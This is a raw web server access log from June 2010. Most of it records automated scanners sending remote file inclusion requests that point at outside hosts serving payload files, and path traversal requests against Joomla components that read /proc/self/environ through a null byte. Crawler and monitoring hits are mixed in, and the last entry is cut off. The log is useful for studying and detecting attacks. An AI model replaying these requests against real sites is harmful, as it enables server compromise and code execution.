64.91.250.11 - - [23/Jun/2010:07:42:58 -0400] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
174.121.217.109 - - [23/Jun/2010:07:43:22 -0400] "GET /logs/access_log.Q109080600/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:07:43:22 -0400] "GET /index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:07:43:22 -0400] "GET /logs/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:07:43:28 -0400] "GET /logs/access_log.Q109052600/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
203.252.71.232 - - [23/Jun/2010:07:43:36 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
174.121.217.109 - - [23/Jun/2010:07:43:36 -0400] "GET /logs/error_log.Q109080600/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
203.252.71.232 - - [23/Jun/2010:07:43:36 -0400] "GET //include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
174.121.166.146 - - [23/Jun/2010:07:43:42 -0400] "GET /logs/error_log.Q110060500/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
67.195.114.223 - - [23/Jun/2010:07:43:51 -0400] "GET /images/_notes/contact_fax.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.245.251 - - [23/Jun/2010:07:44:03 -0400] "GET /logs/error_log.Q109103000 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
69.175.59.242 - - [23/Jun/2010:07:44:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:14 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:14 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:15 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:15 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:15 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:15 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
68.109.233.150 - - [23/Jun/2010:07:44:16 -0400] "GET /logs/error_log.Q109100900/xmlrpc.php HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:07:44:17 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:07:44:17 -0400] "GET /logs/xmlrpc.php HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
69.175.59.242 - - [23/Jun/2010:07:44:24 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:24 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:24 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:24 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:29 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:29 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:30 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:30 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
203.252.71.232 - - [23/Jun/2010:07:44:32 -0400] "GET //include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
83.16.100.218 - - [23/Jun/2010:07:44:33 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:07:44:33 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:07:44:33 -0400] "GET /logs/access_log.Q109081200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:37 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:44:37 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.71.27 - - [23/Jun/2010:07:45:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L029814584B64480046F0091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.7.24 - - [23/Jun/2010:07:45:25 -0400] "GET /logs/access_log.Q110022700//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:45:43 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
67.223.250.16 - - [23/Jun/2010:07:45:44 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
216.227.214.83 - - [23/Jun/2010:07:45:44 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.200.245.35 - - [23/Jun/2010:07:45:44 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:45:48 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:45:49 -0400] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
216.227.214.83 - - [23/Jun/2010:07:45:50 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.200.245.35 - - [23/Jun/2010:07:45:51 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.223.250.16 - - [23/Jun/2010:07:45:52 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
67.223.250.16 - - [23/Jun/2010:07:45:56 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
216.227.214.83 - - [23/Jun/2010:07:45:56 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.200.245.35 - - [23/Jun/2010:07:45:56 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:46:02 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.202.38 - - [23/Jun/2010:07:46:11 -0400] "GET /logs/access_log.Q110051400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:46:11 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:46:11 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
67.223.250.16 - - [23/Jun/2010:07:46:12 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
209.200.245.35 - - [23/Jun/2010:07:46:12 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.227.214.83 - - [23/Jun/2010:07:46:12 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
174.121.217.109 - - [23/Jun/2010:07:46:16 -0400] "GET /logs/access_log.Q109080600/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:07:46:17 -0400] "GET /index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:07:46:17 -0400] "GET /logs/index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
213.5.65.154 - - [23/Jun/2010:07:46:26 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:46:27 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:46:27 -0400] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:46:27 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:46:28 -0400] "GET //include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:46:28 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
67.223.250.16 - - [23/Jun/2010:07:46:29 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
67.30.129.57 - - [23/Jun/2010:07:46:34 -0400] "GET //intern/admin/?=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:07:46:34 -0400] "GET /logs//intern/admin/?=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:07:46:35 -0400] "GET /logs/access_log.Q109052000%20%20//intern/admin/?=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.252.71.232 - - [23/Jun/2010:07:46:36 -0400] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
216.227.214.83 - - [23/Jun/2010:07:46:49 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:46:52 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.200.245.35 - - [23/Jun/2010:07:46:52 -0400] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
209.59.202.38 - - [23/Jun/2010:07:46:55 -0400] "GET /logs/access_log.Q110051400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:46:55 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:46:55 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:46:59 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
94.23.7.24 - - [23/Jun/2010:07:47:03 -0400] "GET /logs/access_log.Q110051400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:47:03 -0400] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:47:03 -0400] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
68.109.233.150 - - [23/Jun/2010:07:47:06 -0400] "GET /logs/error_log.Q109102300//adxmlrpc.php HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:07:47:07 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:07:47:07 -0400] "GET /logs//adxmlrpc.php HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
213.5.65.154 - - [23/Jun/2010:07:47:22 -0400] "GET /logs/error_log.Q110052700/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:47:23 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.5.65.154 - - [23/Jun/2010:07:47:28 -0400] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.202.38 - - [23/Jun/2010:07:47:32 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
172.16.1.180 - - [23/Jun/2010:07:47:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:47:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:47:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.7.24 - - [23/Jun/2010:07:47:52 -0400] "GET /logs/error_log.Q110051400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
69.175.59.242 - - [23/Jun/2010:07:48:27 -0400] "GET /logs/access_log.Q109071700////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:31 -0400] "GET /logs/access_log.Q109111400////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:36 -0400] "GET /logs/access_log.Q109100200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:39 -0400] "GET /logs/access_log.Q109071700////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:43 -0400] "GET /logs/access_log.Q109111400////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:47 -0400] "GET /logs/access_log.Q109071700////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:48 -0400] "GET /logs/access_log.Q109100200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.5.65.154 - - [23/Jun/2010:07:48:50 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.175.59.242 - - [23/Jun/2010:07:48:52 -0400] "GET /logs/access_log.Q109111400////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.59.242 - - [23/Jun/2010:07:48:56 -0400] "GET /logs/access_log.Q109100200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Jun/2010:07:48:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:48:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Jun/2010:07:49:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.117.255.170 - - [23/Jun/2010:07:49:13 -0400] "GET //components/com_morfeoshow/morfeoshow.html.php?user_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
172.16.1.80 - - [23/Jun/2010:07:49:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:49:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:49:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.7.24 - - [23/Jun/2010:07:49:28 -0400] "GET /logs/access_log.Q110052400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:28 -0400] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:29 -0400] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:34 -0400] "GET /logs/access_log.Q110051800//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:35 -0400] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:35 -0400] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
67.30.129.57 - - [23/Jun/2010:07:49:44 -0400] "GET /logs/access_log.Q109052000//intern/admin/?=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.7.24 - - [23/Jun/2010:07:49:47 -0400] "GET /logs/access_log.Q110051400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:49:58 -0400] "GET /logs/error_log.Q110052400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:50:02 -0400] "GET /logs/access_log.Q110051800//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:50:02 -0400] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:50:02 -0400] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
66.71.245.122 - - [23/Jun/2010:07:50:07 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
67.15.152.183 - - [23/Jun/2010:07:50:24 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
94.23.7.24 - - [23/Jun/2010:07:50:45 -0400] "GET /logs/access_log.Q110032800//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
172.16.1.80 - - [23/Jun/2010:07:50:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:50:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:50:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
76.73.53.138 - - [23/Jun/2010:07:51:15 -0400] "GET //index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.833"
95.108.245.251 - - [23/Jun/2010:07:50:42 -0400] "GET /logs/access_log.Q110033100 HTTP/1.1" 200 6087930 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.15.152.183 - - [23/Jun/2010:07:51:25 -0400] "GET /logs/access_log.Q110051900/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:51:25 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:51:26 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
94.23.7.24 - - [23/Jun/2010:07:51:52 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803" 94.23.7.24 - - [23/Ju